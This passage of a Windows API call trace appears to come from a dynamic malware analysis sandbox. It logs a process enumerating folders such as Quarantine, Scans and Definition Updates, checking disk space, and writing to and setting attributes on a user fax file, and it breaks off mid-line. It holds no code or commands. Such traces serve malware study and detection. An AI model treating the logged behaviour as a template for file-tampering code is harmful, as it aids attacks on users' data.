lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9dbcac, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeea3462, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0156.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0156.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0156.829] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9dbcac, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeea3462, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0156.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0156.830] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.830] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.831] CoTaskMemFree (pv=0x508980) [0156.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0156.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda01e06, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x9a0a5fd1, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportArchive", cAlternateFileName="REPORT~1")) returned 1 [0156.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x810, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb59300, ftLastAccessTime.dwHighDateTime=0x1d42023, ftLastWriteTime.dwLowDateTime=0x2fb59300, ftLastWriteTime.dwHighDateTime=0x1d42023, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportQueue", cAlternateFileName="REPORT~2")) returned 1 [0156.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x810, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb59300, ftLastAccessTime.dwHighDateTime=0x1d42023, ftLastWriteTime.dwLowDateTime=0x2fb59300, ftLastWriteTime.dwHighDateTime=0x1d42023, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportQueue", cAlternateFileName="REPORT~2")) returned 0 [0156.834] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0156.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0156.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0156.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda01e06, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x9a0a5fd1, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportArchive", cAlternateFileName="REPORT~1")) returned 1 [0156.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0156.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0156.836] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.836] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.837] CoTaskMemFree (pv=0x508980) [0156.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0156.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda01e06, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x9a0a5fd1, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0156.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0156.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0156.839] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda01e06, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x9a0a5fd1, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0156.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0156.841] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.841] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.841] CoTaskMemFree (pv=0x508980) [0156.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0156.842] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x810, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb59300, ftLastAccessTime.dwHighDateTime=0x1d42023, ftLastWriteTime.dwLowDateTime=0x2fb59300, ftLastWriteTime.dwHighDateTime=0x1d42023, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0156.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0156.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0156.844] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x810, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb59300, ftLastAccessTime.dwHighDateTime=0x1d42023, ftLastWriteTime.dwLowDateTime=0x2fb59300, ftLastWriteTime.dwHighDateTime=0x1d42023, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0156.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0156.845] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.847] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.847] CoTaskMemFree (pv=0x508980) [0156.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0156.848] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0156.849] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0156.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0156.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scans", cAlternateFileName="")) returned 1 [0156.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 1 [0156.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 0 [0156.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0156.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0156.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0156.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0156.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0156.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0156.855] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.855] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.855] CoTaskMemFree (pv=0x508980) [0156.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0156.856] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0156.857] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Updates", cAlternateFileName="")) returned 1 [0156.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0156.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0156.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0156.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0156.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0156.859] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.859] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.859] CoTaskMemFree (pv=0x508980) [0156.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0156.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0156.861] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.861] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.861] CoTaskMemFree (pv=0x508980) [0156.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.862] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.862] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.862] CoTaskMemFree (pv=0x508980) [0156.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.863] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.863] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.863] CoTaskMemFree (pv=0x508980) [0156.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.864] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.864] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.864] CoTaskMemFree (pv=0x508980) [0156.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.864] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.864] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.865] CoTaskMemFree (pv=0x508980) [0156.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.865] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.865] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.866] CoTaskMemFree (pv=0x508980) [0156.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.866] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.866] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.867] CoTaskMemFree (pv=0x508980) [0156.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.867] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.867] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.867] CoTaskMemFree (pv=0x508980) [0156.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.868] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.868] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.868] CoTaskMemFree (pv=0x508980) [0156.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.869] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.869] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.869] CoTaskMemFree (pv=0x508980) [0156.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.870] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.870] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.870] CoTaskMemFree (pv=0x508980) [0156.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.871] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.871] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.871] CoTaskMemFree (pv=0x508980) [0156.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.872] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.872] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.872] CoTaskMemFree (pv=0x508980) [0156.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.872] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.872] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.873] CoTaskMemFree (pv=0x508980) [0156.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.873] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.873] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.874] CoTaskMemFree (pv=0x508980) [0156.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.874] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.874] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.874] CoTaskMemFree (pv=0x508980) [0156.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.875] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.875] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.875] CoTaskMemFree (pv=0x508980) [0156.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.876] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.876] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.877] CoTaskMemFree (pv=0x508980) [0156.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.877] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.877] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.877] CoTaskMemFree (pv=0x508980) [0156.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.878] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.878] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.878] CoTaskMemFree (pv=0x508980) [0156.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.879] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.879] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.879] CoTaskMemFree (pv=0x508980) [0156.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.880] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.880] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.880] CoTaskMemFree (pv=0x508980) [0156.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.882] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif", lpFilePart=0x0) returned 0x4f [0156.891] WriteFile (in: hFile=0x1c8, lpBuffer=0x228a328*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x228a328*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0156.892] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows 